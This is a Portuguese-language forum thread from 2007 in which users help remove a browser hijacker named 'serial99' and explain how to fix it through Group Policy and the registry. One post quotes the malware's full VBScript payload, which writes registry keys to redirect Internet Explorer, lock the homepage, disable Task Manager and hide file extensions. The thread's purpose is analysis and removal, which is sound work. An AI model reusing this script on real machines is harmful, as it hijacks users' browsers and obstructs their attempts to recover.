1. Este site usa cookies. Ao continuar a usar este site está a concordar com o nosso uso de cookies. Saber Mais.

Virus serial99

Discussão em 'Dúvidas e Suporte Técnico PC' iniciada por nmmr, 26 de Outubro de 2007. (Respostas: 16; Visualizações: 2960)

  1. Alguém que me ajude a eliminar um virus de nome serial99. Este virus por vezes quando abro uma nova webpage ele redireciona-me para a página serial99.com. Outra coisa que aconteceu de esquisito é que deixei de ter acesso ao gestor de tarefas. O meu antivirus (McAfee) não o consegue eliminar nem mesmo com o Adaware. Alguém que me possa ajudar por favor.
     
  2. Kayvlim

    Kayvlim Undefined Moderator
    Staff Member

    este tópico. É a forma mais "universal" de procurar e remover malware :)
     
  3. Eu também tinha esse vírus no meu internet explorer, até que me invoquei e resolvi tirá-lo, é simples, basta entrar em diretivas de grupo clicando em "executar" no menu iniciar e digitando "gpedit.msc" e dando ok. Já em diretivas de grupo vá em CONFIGURAÇÕES DE USUÁRIOS, depois em CONFIGURAÇÕES DO WINDOWS e MANUTENÇÃO DO INTERNET EXPLORER. Agora vá em URLS, depois em URLS IMPORTANTES, na janela que abrir marque PERSONALIZAR A URL DA HOME PAGE e, embaixo coloque a url de sua preferência. Clique em OK e feche o diretivas de grupo. Pronto, agora é só fazer o teste no internet explorer.:001:
    O gestor de tarefas é reativado também em diretivas de grupo. Vá em CONFIGURAÇÕES DO USUÁRIO, depois em MODELOS ADMINISTRATIVOS, em SISTEMAS, depois em OPÇÕES DE CTRL+ALT+DEL e depois em REMOVER 'GERENCIADOR DE TAREFAS'. Marque DESATIVADO e clique em OK. Feche o diretivas de grupo. Agora faça o teste.;)
     
  4. JDaman

    JDaman Power Member

    Podes sempre dar uma limpadela com o VHCleaner!

    Fica Bem.
     
  5. ShadeX

    ShadeX Power Member

    VBS??? Eu a esfregar as mão por um vírus novo e sai-me um shell script... Desilusão... :sad:
     
  6. Kayvlim

    Kayvlim Undefined Moderator
    Staff Member

    VBS? Arranjaste-o? Em caso afirmativo, manda-me o source por PM, sff :P

    Isso quer dizer que este pseudo-vírus só "atacava" quando alguém abria o IE?
     
  7. ShadeX

    ShadeX Power Member

    Angel, é só ires ao site que ele disse. Todos os files são iguais (go figure...). São sempre rar's autoexecutáveis em que o rar faz o setup ao vírus (criativo, muito criativo :) ). Se mudares a extensão para .xpto e fizeres "Abrir com..." e escolheres o WinRAR ele abre o ficheiro e mostra-te o .hta que está lá dentro e o setup script. Basta extrair o .hta e mudar para .txt, voila defused e pronto para análise.

    p.s. passa aqui. Diz lá que não é lindo... Pra quê escrever exploits complicados quando se pode ownar a box apenas intrujando o user... :)
     
    Última edição: 3 de Novembro de 2007
  8. Kayvlim

    Kayvlim Undefined Moderator
    Staff Member

    Nunca tinha ouvido falar em hta. Obrigado pelo link :)

    Realmente, fiquei tão desiludido quanto tu... é que aquilo nem traz nada de especial, e ficou completamente "nu" e sem piada :(

    O terceiro post já disse como remover esse "vírus" (que nome se dá a isto?)...
     
  9. ShadeX

    ShadeX Power Member

    Hmmm... "Microsoft enabled malware for dumb users"? Se bem que a categoria de POS tambem sirva...

    No entanto dá uma ideia de que a coisa pode realmente ser interressante (do ponto de vista sociologico...). Se a coisa seguir esse caminho e a PowerShell evoluir e se tornar algo trivial e widespread, não vais ter grandes razões para "escrever binários" quando um shell script faz o mesmo trabalho.

    E para o Joe User não existe diferença entre um binário "aguerrido" e um shell scrip idêntico. Não sabem lidar com nenhum deles...
     
  10. Carlos Daniel

    Carlos Daniel Banido

    É seguro visitar o site?:D
     
  11. theforbidden1

    theforbidden1 Banido

    E já agora remove-lo no modo de segurança do windows tb é algo útil...
     
  12. ShadeX

    ShadeX Power Member

    Em caso de duvidas tens uma coisa chamada Off By One. Eu no FF não vi nada que sequer me fizesse pensar... Mas utilizadores de IE, bom nem pela alma se lhe reza de uma maneira ou de outra...

    Qqr modo, aquilo não é vírus, é mais um scam. Entre os google ads e os banners e os homepage hijacks eles têm um batalhão de borregos a pagar-lhes as continhas...

    E este não são a variedade que eu possa dizer "tadinhos dos users", é mais a variedade "têm o que pediram".
     
  13. Kayvlim

    Kayvlim Undefined Moderator
    Staff Member

    Desde que não vás lá com o MSIE....
    Eu foi com o Firefox e não tive problemas. De qualquer forma, penso que existem vulnerabilidades no Firefox que também ponham em risco os users, mas são bem mais raras.

    O que é que essa coisa faz, no fundo (tkz, ShadeX :P):
    Código:
    <SCRIPT language=vbs>
    self.MoveTo 0, 0
    Set shell = CreateObject("WScript.Shell")
    
      shell.[B]regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","http://www.serial99.com/?","REG_SZ"
    
      [/B]shell.[B]regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"[/B]
    
      shell.[B]regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"[/B]
    
      shell.[B]regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.serial99.com/?a","REG_SZ"[/B]
    
      shell.[B]regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.serial99.com/?a","REG_SZ"[/B]
    
      shell.[B]regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"[/B]
    
      shell.[B]regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"[/B]
    self.Close
    </SCRIPT>
    
    Dá para reverter as alterações feitas por isso pelo regedit. Nem precisam de arrancar pelo modo de segurança...

    Só por acaso, vá, para além de pharming, há alguma situação em que digas "tadinhos dos users"? :D

    Para o dito "Joe User", eram os .js e .vbs que eram enviados nos mails há alguns anos atrás. Vá lá, nesse tempo eu ainda não tinha Internet, nunca tive problemas :P
    Mas o Melissa ainda foi uma coisa que gostei de ver.
     
  14. ShadeX

    ShadeX Power Member

    Claro que há. O meu negro coração não é assim tão empedernido... :004:

    Se me disserem que estavam a ver o site da Disney no Opera e apanharam um vírus/exploit "à séria" eu tenho pena. Mas se for o site da Ana Malhoa ja tiveram o que mereciam :D
     
  15.  
  16. o que é diretiva de grupo?
     
  17. Diretvas de grupo que eu falei é a janela que fica aberta depois que você clica em OK. É um modo de configurar algumas coisas úteis no windows XP.
     

Partilhar esta Página